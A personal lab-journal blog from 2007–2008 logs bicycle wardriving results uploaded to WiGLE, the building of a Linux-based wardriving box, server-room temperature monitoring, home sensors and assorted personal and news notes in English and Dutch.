The wardrive yesterday evening was around some streets in Groenekan. Not that special, it was all within bicycle range, on the level of 'detour in my commute'. But, it was the same area where I decided to build the dedicated wardriving hardware. The area is now in WiGLE and I jumped up in networks found with gps locations by finding gps locations for earlier found networks.

Wardriving results 4 - 27 March: 3487 new networks with gps locations. From time to time I also use the gps logs from wardriving for mapping for OpenStreetMap. The map of the Netherlands in OpenStreetMap is quite complete thanks to a donation of data by AND but a lot of bicyclepaths are missing. My wardriving is usually by (recumbent) bicycle so I can use wardriving tracklogs for mapping too. I even contributed a bit about mapping with Kismet for OpenStreetMap to the Wiki.

Lately a major factor in spam seems to be casino spam. I see names popping up like Royal VIP Casino or Euro VIP Casino. According to analysis by James Miller it is all the same company from Antigua.

Average bicycle speed on my commute today: 22.9 kilometer per hour. A new speed record for me. It felt very good too!

no solar power

Picture I took yesterday morning in the back garden.

Not so subtle advice from Sans in the latest Sans newsbites:

Don't open email attachments unless you were expecting them. Send a note back and ask the person to embed the text in a simple email. This matters to your career. The people who break this rule will be the reason their organization's data are stolen and they won't be able to hide.

De spoorwegen in Nederland blijven altijd een paar jaar achterlopen op die in Engeland, en nu is volgens reizigersvereniging Rover eindelijk het excuus van the wrong kind of snow gebruikt door Prorail.
Bronnen: Reizigersvereniging Rover: “Ontwrichting treinverkeer door sneeuw is blamage”, nu.nl: 'Ontwrichting treinverkeer regelrechte blamage'

Today is one of those if you don't like the weather, wait five minutes days. I have seen snow, hail and sun in the last thirty minutes and rain will probably happen too soon. The webcam shows interesting cloud views and the temperatures at home are dropping due to the snow on the roof.

We zijn naar het paastreffen van de nederlandse vereniging voor human powered vehicles (oftewel de ligfietsclub) geweest. Zaterdag naar Harskamp gefietst samen met een paar andere Utrechtse ligfietsers. Vlak voor we weggingen regende het serieus maar onderweg bleef het beperkt tot een licht buitje regen of sneeuw. Dit jaar viel pasen heel vroeg en het was de koudste pasen in 40 jaar volgens het knmi. We hebben nachtvorst gehad en sneeuw van de tent af moeten ruimen, ook een nieuwe ervaring voor ons. Mijn slaapzak is goedgekeurd voor lage temperaturen, ik heb prima kunnen slapen ondanks de koude. Zondag hebben we een mooie toertocht door de omgeving van Harskamp gemaakt. Zonnetje erbij en het was prima te doen. Zondagavond ging het sneeuwen en die sneeuw lag vanmorgen op de tent. Vandaag terug per fiets, maar toen er weer buien sneeuw kwamen hebben we het voor de rest uitbesteed aan de nederlandse spoorwegen om thuis te komen. En dan blijkt maar weer wat een gedoe het is om 2 ligfietsen en 1 aanhanger in en uit een trein te krijgen. Wel weer leuk zo'n evenement, de ligfietsclub is heel gezellig en een groep mensen met een heel andere focus (maar 1 nerd-shirt gezien dit weekend) dan andere groepen mensen waar ik mee te maken heb, en dat blijf ik een leuke ervaring vinden.

A new version of my homepage, rewritten in perl because PHP was starting to irritate me. More database-driven in the background which allows me to add things like the tags. And a minor change in the colour scheme because someone remarked that the black-on-cyan was hard to read for people above a certain age.

Time to change my signature at work: we switched off the last Sun server today. I updated my .signature which mentioned 'herding Suns' to 'herding systems'. Most server-hardware at work is from Dell running Linux but that doesn't sound as good.

One of the little irritations at work was trying to find out what the exact error was of the printer when the helpdesk ticket just says 'printer problems'. Since HP laserjets will divulge everything via SNMP, I thought the complete information must be available. It is, and I gobbled together a perl script for our noc webserver. Public version in the perl noc stuff page.

Indexed also has a nice view on the 7 new flavors of sin.

The Vatican has published a modernized version of the 7 deadly sins (over 1500 years old). Toronto Star article: Thou shalt not pollute or clone. Still no listing for installing microsoft windows or connecting microsoft windows to the Internet...

Did some work on The Virtual Bookcase. First of all Amazon notified me that amazon web services was going to disable version 3 of the API which I was still using (yes, a year after the first notification that it was going to be ended .. not that much time for virtualbookcase at the moment). So time to do some PHP programming and redo the stuff for version 4. I also noticed that the bot for the russian search site Yandex was causing high amounts of hits but would not even return a direct link to www.virtualbookcase.com when searching on virtual bookcase at yandex. So I wanted to disable Yandex in robots.txt but I could not easily find the right name to put in robots.txt because all the help at Yandex is also in Russian. Finally I found some hints at this page describing robots.txt in russian that the right User-Agent probably is Yandex. And the robots.txt for cisco.com agrees.

I downloaded Adam Curry's Daily Source Code #732 where he mentioned phonecaster.de (german site). Phonecaster.de links phone numbers with podcasts, playing (by default) the most recent episode of a podcast when you dial the linked number. According to the phonecaster technical faq the service uses Asterisk. Sounds a lot like an upscaled version of my bel een podcast project (dutch).

I found an interesting tidbit in the apache-config today: after setting the AuthLDAPBindPassword directive I could find the password in the server-info output. Which was to be expected, but still an interesting side-effect.

Wardriving results 24 Februari - 3 March: 4377 new networks with GPS locations. The wardriving box is helping, together with having nice weather and time for long bicycle rides around Utrecht. I passed the 90000 new networks mark at WiGLE and I'm back at position 22 in the WiGLE stats.

Funny new music doing the rounds: SoKO with the weird song I'll kill her.

Real test of the wardriving box yesterday: I brought it along on my recumbent bike on a 38 kilometer biking trip. With the big antenna on a piece of metal on the rack of the recumbent bicycle. Worked great and found 1354 new networks with GPS locations.

The wardriving box is finished and I have done the first test today. And scored new networks! Between 13 Februari and 23 Februari I found 184 new networks with GPS locations. Of those 108 using the laptop on bicycle, 63 in the first testrun using the wardrivebox on bicycle and 13 from testing the wardrive box at home. Yes, I can still find new networks at home without moving.

I left the wardriving box running overnight to test the stability and heat generation. No problems in those areas. It was on the top floor of the house in the window facing northwest (in the direction of the student flats). A total of 43(!) access-points were seen. Yes, wireless networks are still rising in numbers.

I had some time for work on the wardriving box. I fixed the powerbutton problem by switching to Linux kernel 2.6.24.2. Linux 2.6 has specific support for the geode processor which include acpi support. With 2.6 I get a good power-button event when I press it and on a shutdown with powerdown the alix system is powered down completely (power led goes out). I also worked on the case, making holes for the antenna connectors. I managed to make the right holes and modify the I/O shield without making the wrong holes or get damaged myself. My teacher in metalwork years ago would probably think I'm still bad at it but with a drill and a metal file the modifications got done, including filing the flange of the N-connector to make it fit in the case. Pictures of the results,

Results of the metalwork.

Antenna connectors in place and the I/O shield modified to allow for the big N-connector.

Board installed in the case.

I'm also learning about Linux 2.6: without a keyboard there is not a lot of entropy for /dev/random.

The battery (and the charger) for the wardriver box arrived. Even with the room number and the department missing from the address label the internal mail still managed to deliver it to my desk.

Ik ontdekte een verwijzing naar mijn homepage bij het overzicht van labjournaals van Henk van de Kamer die ik ken via de hcc PCgg netwerkgroep. Ik volg Het Lab van Henk van de Kamer ook regelmatig.

A few minor setbacks on the wardriving box project yesterday evening. Software shutdown via acpid does not work (there is no event when I press the power button). Kernel recompiling for acpi debugging gave me lots of headaches with the module versioning. I did some searching for it and the Linux Loadable Kernel Module HOWTO had the answer:

So it is generally not wise to use symbol versioning

.. words to the wise. And the CF connector of the M200 case is a normal 40 pin IDE connector where I bought a cable for 44pin 2mm ide connectors because the alix.1c mainboard has a 44pin ide header. It would be nice if I could fix this, I could use the external CF-bay of the M200 case which would mean I wouldn't have to open it to change/upgrade the CF. The manual of the M200 case has stern warnings about opening and closing it too often.

Wardriving results between 12 January and 12 February 2008: 1321 new networks with GPS location. Since the work on the wardriving box software and hardware the GPS and the antenna have been at home for testing it all.. and I did not feel like bringing the stuff along and getting another run with problems. I ordered the battery and a charger yesterday and did some more test runs, some with the external antenna connected. The big external antenna gives me 23 visible networks at home. Work that is left on the wardriving box: cabling, making holes in the case for antenna and power connections and building it all together.

Back from the snow! We went for a week of snowboarding in Samoëns, France. Great snow, good weather and no broken bones. We stayed at the Viking Lodge, a very nice and luxurious apartment. Besides snowboarding for real I also played with Amped3 on the xbox 360 in the apartment ;)

Just doing the rounds: Bloomberg: Microsoft Offers to Buy Yahoo for $44.6 Billion, CNN: Microsoft bids $45 billion for Yahoo.

An interesting bit of news. Analysts at Google are probably laughing out loud because this means Microsoft is really scared now. Even with Microsofts own search technology, mapping products and other comparable offerings in the main markets where Microsoft, Google and Yahoo compete, Microsoft still wants to buy Yahoo and invest a lot in getting a better angle on the search and information market.

My view: If this deal goes through (I can imagine the FTC wants to see whether this could cause a search and information monopoly) we move towards two gigantic search and information companies. With the current wish for more privacy, even in the US and more awareness of the amounts of personal data gathered by companies, one of them will end up as the big bad evil data-hoarding company. Google was in danger of getting this title because they were slowish to respond to the increased awareness about privacy and data retention but when the competition in search and information is Microsoft, Google looks a lot better as the nice and user friendly company.

First network scanned with the wardriving box uploaded to WiGLE. Not a new network (my own), but a valid upload anyway. Now for the final automation bit: starting kismet at the end of the boot process with the right drivers and settings. And the hardware bits: power and antenna connectors on the case and a battery (and charger) to power it all when not on my desk. And making sure it can all be brought along on the bicycle or in a car.

A fellow wardriver asked for a picture of the new wardriving box which is still awaiting serious hardware work, but the software is mostly up and running.

The wardriving box with notes about the different parts

First boot on the wardriving box (like first light on a telescope). Thursday evening I had some actual time to play with the mainboard and a CF card. With a lot of peeking at the presentation on building flash-based Linux routers by Remco van Mook I was able to get a basic Debian Linux to run on the Alix board in little time. It boots, it starts a few getty processes and ifplugd. I also automated work on converting the local installation to a root image and the root image to the CF card.

A few updates to the weather maps recently: The maps are now generated each hour and there is a list of the recent weather maps.

The hardware I ordered for the wardrive box arrived yesterday. Now to find time to start playing with the enclosure, finding the right spot for the antenna connectors, doing the drilling for that, building it all together and after that working on the software. The manual for the enclosure starts with telling you need to take time to understand what needs to be done because you can only open and close the enclosure so many times.

Gisterenavond zijn we gaan snowboarden/Skiën in de sneeuwbaan van de Uithof in Den Haag. Lekker om nog een paar uur te oefenen voor we echt naar de sneeuw gaan. Helaas was de baan in een niet zo ideale conditie: grote stukken ijs.

I did it: Another wardrive with partly missing GPS locations because of a GPS problem Thursday was the reason I needed to start ordering parts for the wardriving box. So I clicked an order together at LinITX.com for the hardware.

I always thought the "Braille edition of Playboy" was just a joke in the movie Sneakers. But! It is no joke: the braille edition of the playboy, available from The National Library Service for the Blind and Physically Handicapped. ObJoke: you will really read this for the articles.

In a websearch about wardriving I came across a nice article on wardriving for people with enough time and budget which is probably known better as a wireless security penetration project: Spy guys: The anatomy of a covert wireless security assessment. Including notes on what kind of wheels to rent for ideal wireless scanning: a box truck has room and fiberglass sidewalls.

I noticed that I haven't posted wardriving results since 31 October 2007. Well, even with the recumbent bike, gps problems and winter weather I still scored new networks with GPS locations at WiGLE. In the backlog I can see that between 16 November 2007 and 11 January 2008 I found 1272 new networks with GPS locations. A the moment I am at position 24 in the WiGLE stats, a slight drop from the 23 I occupied for quite a while.

We monitor the temperatures in the server room at work carefully, and viewing the changes over a while makes it look like the server room is a multistable climate system.

Our interest in temperatures

On 23 December 2006 we had a complete failure of the airconditioning system in the serverroom at work. One of the worst days of the year to have this, we did not find out until 24 December due to e-mail from our NetApp fileserver telling us the main board was becoming too hot. After that a co-worker went over there and started opening windows and calling support for the airconditioning system. No replacement parts would be available before 2 January 2007 so in that week lot of work was done with makeshift cooling using fans and open windows.

We changed the monitoring system to notify us when the temperature in the serverroom goes above 35 degrees. Which it had to notify us 2 times of on 20 January and 11 March 2007.

The easiest way to get temperature readings is from the temperature sensors in the UPSes at the bottom of each rack. We use the Network UPS Tools package which allows us to check the temperature sensor via the network from a central monitoring system.

The airconditioning system blows cool air via the space below the raised floor into the racks. So the temperature measured by the UPS units is closely related to the output temperature from the airconditioning system.

Watching ntp servers and temperatures

As we are a big fan of statistics and nice graphs, we also started graphing the temperatures. We already watch the ntp servers very thoroughly (you can view our public ntp graphs) and noticed interesting connections between the temperatures and the PLL loop value. Any change in temperature due to door openings, changes in hardware or outside weather shows as a change in PLL values. Usually after a while the ntp daemon stabilizes at a new PLL value.

The multistable system

The bigger picture is that the entire server room seems to work like a multistable climate change. Any change to the input parameters, including a simple change like opening the door of a rack changes the system which eventually leads to a slow movement to a new stable situation.

21 December 2007 I added temperature sensors to the top of each rack. These sensors are more precise than those inside the UPS and more exposed to the air temperature.

These sensors show even better how any change influences the system. After a change, a new stable temperature will be found after a few hours. 3 January I moved a floor tile directing the airflow in one rack and the temperature at all rack tops rose, with the one at the top of the affected rack nearly a degree celsius. After nearly a day I moved the tile back which reversed most of the change.

The current idea is to add a lot more temperature sensors in the racks, near the inlet and outlet of the airconditioning unit, below the raised floor in several places and on the inside and outside of the walls of the server room.

Study of this climate system

Should someone be interested in studying this climate system, get in touch!

But the server-room climate is stable!

According to Current Weather Conditions in the CSL the server room should have a stable temperature and humidity. We know better.

Another instance of me thinking so seriously about a project that I started a webpage about what I want to do and how and collecting the knowledge and ideas that I already have: building a wardriving box. I first thought of a small PC for project sundial, the self-powered weather station and gps time receiver but I got the idea that this could also make a really nice Wardriving box which would do just that.

Slowly I'm no longer denying the blogness of this page ;). View myTechnorati Profile. I got the idea from Kirrily Robert's article Technorati and Perl.

I just read an article about the Neuros OSD: a digital video recorder which is different: the OSD stands for 'Open Source Device', it runs Linux and you are free to modify it in any way you wish. The Neuros OSD site shows a device with a lot of potential. Something I'll keep an eye on.

Yesterday I found some time to install the new 1-wire sensors in a place where I am interested in the temperatures: the attic where the home server gosper lives and started fetching data into rrdtool databases. The assorted sensors at home page now shows some of the available temperatures. Sensor 2 lies in the open area right below the top of the roof.

athcool is .. cool! The new server mainboard was consuming some more power and was at a higher temperature. I looked for ways to reduce this a bit. Setting power throttling mode to T1 did not help for power use or temperature (but the system reacted slowish), but athcool made the readouts from lm_sensors change from CPU Temp: +42.8 C to CPU Temp: +21.5 C which looks a lot better. And, more important: the UPS reports a drop in power-use, which is good for the electricity bill. Follow the graphs at my assorted sensors at home.
Update: the chance of instability mentioned in the documentation happened to me so athcool is disabled again on the server.

The 1-wire sensors and adaptor I ordered arrived today and I started playing with DigiTemp. After running into a faq item (make sure you don't have crossed phone cable) it started working like a charm. The DS18S20 sensors work really easy and they are quite precise and fast to react to temperature changes such as touching fingers. Two sensors in the home office: on a switched-on PC speaker Sensor 1 C: 19.38, on another speaker switched-off Sensor 0 C: 18.81.

My first CPAN upload. I uploaded Geo::METAR 1.15 to CPAN just now. Time to find out if I did stuff right.

Happy new year! I used the christmas period to do an upgrade I have been planning for a while: change the mainboard of the home server gosper to a newer (better: less older) one. A few hours of screwing worked: it now is an AMD Athlon 1400. Everything works after a few bits of tweaking, including updated mainboard temperature sensors.